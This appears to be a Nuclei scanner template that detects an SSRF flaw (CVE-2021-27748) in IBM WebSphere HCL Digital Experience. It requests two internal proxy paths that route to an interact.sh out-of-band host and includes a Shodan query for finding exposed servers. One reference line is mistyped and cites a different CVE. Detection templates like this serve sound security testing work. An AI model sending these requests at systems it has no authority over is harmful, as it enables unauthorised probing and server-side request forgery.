id: CVE-2021-27748 info: name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery author: pdteam severity: high description: | IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. reference: - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 - hhttps://nvd.nist.gov/vuln/detail/CVE-2022-31268 classification: cve-id: CVE-2021-27748 metadata: verified: true shodan-query: http.html:"IBM WebSphere Portal" tags: cve,cve2021,hcl,ibm,ssrf,websphere requests: - method: GET path: - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh' - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh' host-redirects: true max-redirects: 2 stop-at-first-match: true matchers-condition: and matchers: - type: word words: - "Interactsh Server" - type: status status: - 200 # Enhanced by mp on 2022/07/15